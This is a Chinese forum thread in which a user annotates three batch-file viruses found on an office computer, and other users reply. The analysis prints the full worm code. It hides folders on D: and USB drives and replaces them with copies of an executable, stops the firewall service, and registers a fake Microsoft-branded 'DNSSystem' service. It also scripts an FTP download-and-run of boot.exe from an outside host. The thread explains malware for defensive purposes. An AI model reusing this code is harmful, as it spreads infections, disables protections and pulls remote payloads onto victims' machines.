所需阅读权限 1[原创] 一个批处理病毒解读:systen.exe

cjiabing

最近在办公室电脑发现一个病毒，其中有三个BAT文件，现在拿出来解读下，方便大家杀毒！~
专杀推荐使用：批处理杀毒模板VirusCleaner V1.0.bat


dd.bat病毒文件注释

del C:\WINDOWS\system32\a.txt,C:\WINDOWS\system32\b.txt,C:\WINDOWS\system32\c.txt,C:\WINDOWS\system32\d.txt
::删除a、b、c、d四个文档，应该是临时文件，没见到内容。
ATTRIB C:\WINDOWS\system32\mail3.vbe +s +h & ATTRIB C:\WINDOWS\system32\Attusb.dll +s +h & ATTRIB C:\WINDOWS\system32\autousb.bat +s +h & ATTRIB C:\WINDOWS\system32\WIN.bat +s +h
::给几个病毒文件添加隐藏和系统属性：mail3.vbe、Attusb.dll、autousb.bat、WIN.bat
::看英文名称大概懂得它们的作用。
dir d:\ /a:d-s /b > %SystemRoot%\system32\ok.txt
::多余的一个步骤：获得D盘的文件夹
for /f "delims=" %%q in (%SystemRoot%\system32\ok.txt) do (
ATTRIB  "d:\%%q" +s +h & copy %SystemRoot%\system32\down.exe "d:\%%q.exe"
)
)
del %0
::隐藏D盘文件夹，并拷贝病毒文件down.exe进去，伪装成原来的文件夹。
::最后删掉本程序。不懂怎么多了一个括号，看来这家伙学艺不精。

WIN.bat 病毒文件注释

start "C:\Program Files\Internet Explorer\IEXPLORE.EXE"  http : // www .kkk8. org
::后台打开某个网页，估计是病毒网站，不要随便打开！
@ dir %SystemRoot%\system32 |find "SuCH0ST.exe"
::搜索SuCH0ST.exe？搞不懂，没必要这样麻烦吧？SuCH0ST.exe有点模仿系统进程的意味！~
@ if %ERRORLEVEL%==0 goto ok
@ if %ERRORLEVEL%==1 goto end
::不喜欢用返回码，用&&和||更好。
::不喜欢一堆@头……，一个@echo off的事……
k
::我总觉得这样的临时文件和标签很有我早期写BAT的风格，难道是我的粉……？！
@ net stop sharedaccess
sc stop sharedaccess
::停用系统防火墙服务：sharedaccess
^c^o^p^y ^c^m^d^.^e^x^e ^S^V^C^H^0^S^.^e^x^e /y
::这种用法没接触过，有点那个……
@ cmd /c sc create DNSSystem  binpath= "%systemroot%\system32\SVCH0S                                                                               /c  start SuCH0ST.exe " start= auto
@ cmd /c sc config DNSSystem displayname= "System DNS"
@ cmd /c sc config DNSSystem type= interact type= own
@ cmd /c sc description DNSSystem "(C) Microsoft Corporation 公司提供的(DNS)域名解析程序,如果该服务被停用，任何依赖它的服务将无法启动。"
@ sc start DNSSystem
::无非是山寨服务项：DNSSystem
%SystemRoot%\system32\SuCH0ST.exe
@ exit
::运行SuCH0ST.exe并退出此程序。
:end
@ net stop sharedaccess
sc stop sharedaccess
del boot.exe /q
::这个boot.exe是干嘛用的？
echo o kkksunhopp.3322.org  > 1.RMVB&echo 1234 >> 1.RMVB&echo 1234 >> 1.RMVB&echo get boot.exe boot.exe >> 1.RMVB&echo del down.exe >> 1.RMVB&echo bye >> 1.RMVB
::写了几条信息到文件 1.RMVB 中，搞嘛？
ftp -s:1.RMVB
del 1.RMVB
::ftp并删除
ping 127.0.0.1 -n 3
cmd /c boot.exe
ping 127.0.0.1 -n 10
del %SystemRoot%\system32\boot.exe /q
exit
::间隔运行boot.exe，这个就是隐藏后台运行的家伙。

autousb.bat 病毒文件注释

setlocal EnableDelayedExpansion
:1
fsutil fsinfo drives >%SystemRoot%\system32\output.txt
find ":\" < %SystemRoot%\system32\output.txt >%SystemRoot%\system32\out.txt
del %SystemRoot%\system32\output.txt /q
for /f %%i in (%SystemRoot%\system32\out.txt) do (
fsutil fsinfo drivetype %%i|find "可移动驱动器" &&echo %%i>>%SystemRoot%\system32\output.txt
)
::无非是获得可移动驱动器——U盘。

if not exist %SystemRoot%\system32\output.txt goto 3
for /f %%r in (%SystemRoot%\system32\output.txt) do (
set var=%%r
cd /d !var!
dir /a:d-s /b > %SystemRoot%\system32\ok.txt
for /f  "delims=" %%q in (%SystemRoot%\system32\ok.txt) do (
ATTRIB  "%%q" +s +h & copy %SystemRoot%\system32\down.exe "!var!%%q.exe"
)
)
::同上，将病毒伪装成U盘文件夹。
:3
EXPL0RER /n 10 127.0.1 &goto 1
::定位?估计又被山寨了，这个EXPL0RER中间是数字0，而非字母O！！不懂干嘛用的。

狱渊

看不懂  深奥啊

BillGates

觉得很粗糙，之前也抓过，但不懂怎么破，不同的是我抓的是exe的，没有批处理辅助。

luckboy45

看到这个病毒脚本，我笑了。。。07年我写的就比这些好了，曾经写过病毒生成机，可自动生成病毒脚本。突然怀念过去的脚本了。。。过来顶一下，我是反病毒的逍遥@浪子@

zh_1452

看不懂  深奥啊
狱渊 发表于 2013-4-30 10:21

    病毒特征与原理：第一，隐藏第二传播，第三复制演变。。。。。。

shen198

看了，有很多不懂，求解惑:
1.ATTRIB  "d:\%%q" +s +h & copy %SystemRoot%\system32\down.exe "d:\%%q.exe
        这句生成带exe后缀的“文件名”，应该是没有用户看了会按的吧，中毒现象太明显了
        如果直接copy成 无后缀的文件，好像是生成不出来的
2.DNSSystem有什么作用，百度不出来
3.cmd命令 为什么要使用这个命令 直接运行也是可以的吧